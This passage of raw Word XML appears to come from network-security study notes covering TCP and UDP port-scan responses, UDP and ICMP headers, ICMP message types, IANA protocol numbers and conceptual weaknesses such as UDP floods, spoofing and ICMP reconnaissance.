        </w:rPr>
        <w:t xml:space="preserve"> connections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81124" w:rsidRDefault="00A81124" w:rsidP="00A81124">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00886581" w:rsidRPr="00886581" w:rsidRDefault="00886581" w:rsidP="00886581">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00886581">
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Port Scanning:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00886581" w:rsidRPr="00886581" w:rsidRDefault="00886581" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00886581">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Port open</w:t>
      </w:r>
      <w:r w:rsidRPr="00886581">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
        <w:t>SYN + ACK is returned</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00886581" w:rsidRPr="00886581" w:rsidRDefault="00886581" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00886581">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Port Closed</w:t>
      </w:r>
      <w:r w:rsidRPr="00886581">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
        <w:t>RST is returned</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335CD8" w:rsidRPr="00A81124" w:rsidRDefault="00A81124" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A81124">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>User Datagram</w:t>
      </w:r>
      <w:r w:rsidR="00CD6B06" w:rsidRPr="00A81124">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Protocol (UDP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81124" w:rsidRDefault="00A81124" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A81124">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UDP uses a simple transmission model without implicit hand-shaking dialogues for guaranteeing reliability, ordering, or data integrity. Thus, UDP provides an unreliable service and datagrams may arrive out of order, appear duplicated, or go missing without notice. UDP assumes that error checking and correction is either not necessary or performed in the application, avoiding the overhead of such processing at the network interface </w:t>
      </w:r>
      <w:r w:rsidRPr="00A81124">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>level. Time-sensitive applications often use UDP because dropping packets is preferable to waiting for delayed packets, which may not be an option in a real-time system.</w:t>
      </w:r>
      <w:r w:rsidR="00886581">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00886581" w:rsidRPr="00886581">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">UDP </w:t>
      </w:r>
      <w:r w:rsidR="00886581">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="00886581" w:rsidRPr="00886581">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>provides broadcasting and multicasting</w:t>
      </w:r>
      <w:r w:rsidR="00886581">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81124" w:rsidRDefault="00A81124" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A81124" w:rsidRPr="00A81124" w:rsidRDefault="00A81124" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A81124">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Packet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02"/>
        <w:gridCol w:w="2250"/>
        <w:gridCol w:w="2250"/>
      </w:tblGrid>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bits</w:t>
            </w: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0 - 15</w:t>
            </w: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16 - 31</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Destination Port</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Checksum</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64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 </w:t>
            </w:r>
            <w:r w:rsidRPr="00A81124">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:br/>
              <w:t>Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A81124" w:rsidRDefault="00A81124" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00886581" w:rsidRPr="00D1486B" w:rsidRDefault="00886581" w:rsidP="00886581">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TCP Security Problems:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81124" w:rsidRPr="00886581" w:rsidRDefault="00886581" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00886581">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DOS – UDP Flood attacks. Lots of UDP packets to randon ports on a target will result in resource consumption by the victim having to send many ICMP unreachable messages. Spoofed IP will also result in the reponses going to another potential victim of the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81124" w:rsidRPr="00886581" w:rsidRDefault="00886581" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00886581">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Spoofing / MITM - Easy to spoof since no state information is maintained at either host providing the application layer doesn’t have protection method.  MITM is also possible using traditional ARP spoofing and routeing attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00886581" w:rsidRPr="00886581" w:rsidRDefault="00886581" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00886581">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Port Scans:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00886581" w:rsidRPr="00886581" w:rsidRDefault="00886581" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00886581">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Port open </w:t>
      </w:r>
      <w:r w:rsidRPr="00886581">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>reply/noreply depending on application and data sent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00886581" w:rsidRPr="00886581" w:rsidRDefault="00886581" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00886581">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Port closed </w:t>
      </w:r>
      <w:r w:rsidRPr="00886581">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>ICMP destination unreachable + port unreachable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00886581" w:rsidRPr="00A81124" w:rsidRDefault="00886581" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD6B06" w:rsidRPr="00A81124" w:rsidRDefault="00CD6B06" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A81124">
        <w:t xml:space="preserve">Internet Control Messaging Protocol (ICMP) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E003A3" w:rsidRDefault="00E003A3" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ICMP communicates error messages and other conditions that require attention for TCP/IP communications. ICMP messages are usually acted on by either the IP layer or higher layer protocol (TCP or UDP). Some ICMP messages cause errors to be returned to user processes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E003A3" w:rsidRPr="00E003A3" w:rsidRDefault="00E003A3" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ICMP Header </w:t>
      </w:r>
      <w:r w:rsidRPr="00E003A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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07"/>
        <w:gridCol w:w="489"/>
        <w:gridCol w:w="513"/>
        <w:gridCol w:w="563"/>
        <w:gridCol w:w="563"/>
      </w:tblGrid>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0-7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8-15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16-23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24-31</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b/>
                <w:bCs/>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Code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Checksum</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b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>32</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ID</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Sequence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E003A3" w:rsidRPr="00E003A3" w:rsidRDefault="00E003A3" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E003A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ICMP Types: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272"/>
        <w:gridCol w:w="518"/>
        <w:gridCol w:w="3640"/>
      </w:tblGrid>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Description</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0 - Echo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Echo reply (used to ping)</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 and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i/>
                <w:iCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Reserved</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3 - Destination Unreachable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network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host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protocol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port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Fragmentation required, and DF flag set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route failed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network unknown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host unknown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host isolated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Network administratively prohibited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Host administratively prohibited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Network unreachable for TOS</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Host unreachable for TOS</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Communication administratively prohibited</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4 - Source Quench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quench (congestion control)</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5 - Redirect Message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Network</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Host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TOS &amp; network</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TOS &amp; host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8 - Echo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Echo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9 - Router Advertisement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Router Advertisement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10 - Router Solicitation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Router discovery/selection/solicitation</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11 - Time Exceeded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TTL expired in transit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Fragment reassembly time exceeded</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12 - Parameter Problem: Bad IP header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Pointer indicates the error</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Missing a required option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Bad length</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 xml:space="preserve">13 </w:t>
            </w:r>
            <w:r w:rsidR="00991A5D">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
            <w:r w:rsidRPr="00E003A3">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> Timestamp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Timestamp</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14 - Timestamp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Timestamp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15 - Information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16 - Information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17 - Address Mask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Address Mask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18 - Address Mask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Address Mask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 xml:space="preserve">30 </w:t>
            </w:r>
            <w:r w:rsidR="00991A5D">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
            <w:r w:rsidRPr="00E003A3">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> Traceroute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Request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E003A3" w:rsidRPr="00991A5D" w:rsidRDefault="00E003A3" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00991A5D">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Security Problems:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E003A3" w:rsidRDefault="00E003A3" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00991A5D">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Easy to spoof since no src/dst checking is performed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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Subnet mask requests reveal network topology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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Timestamp request can obtain the system time of a target for timing based attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335CD8" w:rsidRP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Redirect messages can lead to routing attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00886581" w:rsidRDefault="00CD6B06" w:rsidP="00991A5D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B1b - </w:t>
      </w:r>
      <w:r w:rsidR="00335CD8" w:rsidRPr="00EE3290">
        <w:t>Awareness that other IP protocols exist.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335CD8" w:rsidRPr="00991A5D" w:rsidRDefault="00886581" w:rsidP="00335CD8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00991A5D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Many other protocols exist outside and inside the TCP/IP Protoc</w:t>
      </w:r>
      <w:r w:rsidR="003C6848" w:rsidRPr="00991A5D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ol suite. Within TCP/IP </w:t>
      </w:r>
      <w:r w:rsidRPr="00991A5D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IANA </w:t>
      </w:r>
      <w:r w:rsidR="003C6848" w:rsidRPr="00991A5D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">maintain the protocol number list originally within RFC 790. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003C6848" w:rsidRPr="00991A5D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003C6848" w:rsidRPr="00991A5D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> has an updated list of the protocols within its program directory. Some common IANA protocol numbers include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C6848" w:rsidRPr="00991A5D" w:rsidRDefault="003C6848" w:rsidP="00335CD8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C6848" w:rsidRPr="00991A5D" w:rsidRDefault="003C6848" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00991A5D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1: Internet Control Message Protocol (ICMP) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C6848" w:rsidRPr="00991A5D" w:rsidRDefault="003C6848" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00991A5D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">2: Internet Group Management Protocol (IGMP) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C6848" w:rsidRPr="00991A5D" w:rsidRDefault="003C6848" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00991A5D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">6: Transmission Control Protocol (TCP) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C6848" w:rsidRPr="00991A5D" w:rsidRDefault="003C6848" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00991A5D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">17: User Datagram Protocol (UDP) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C6848" w:rsidRPr="00991A5D" w:rsidRDefault="003C6848" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00991A5D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">89: Open Shortest Path First (OSPF) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C6848" w:rsidRPr="00991A5D" w:rsidRDefault="003C6848" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00991A5D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>132: Stream Control Transmission Protocol (SCTP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C6848" w:rsidRPr="00991A5D" w:rsidRDefault="003C6848" w:rsidP="00335CD8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C6848" w:rsidRPr="00991A5D" w:rsidRDefault="003C6848" w:rsidP="00335CD8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00991A5D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Outside of the TCP/IP stack there are also plenty of networking protocols. Some examples include: SLIP, PPP, X25, X11, ATM, Novell IPX / SPX, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C6848" w:rsidRDefault="00991A5D" w:rsidP="00991A5D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>B2 - Network Architectures</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00991A5D" w:rsidRPr="00991A5D" w:rsidRDefault="00991A5D" w:rsidP="00991A5D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
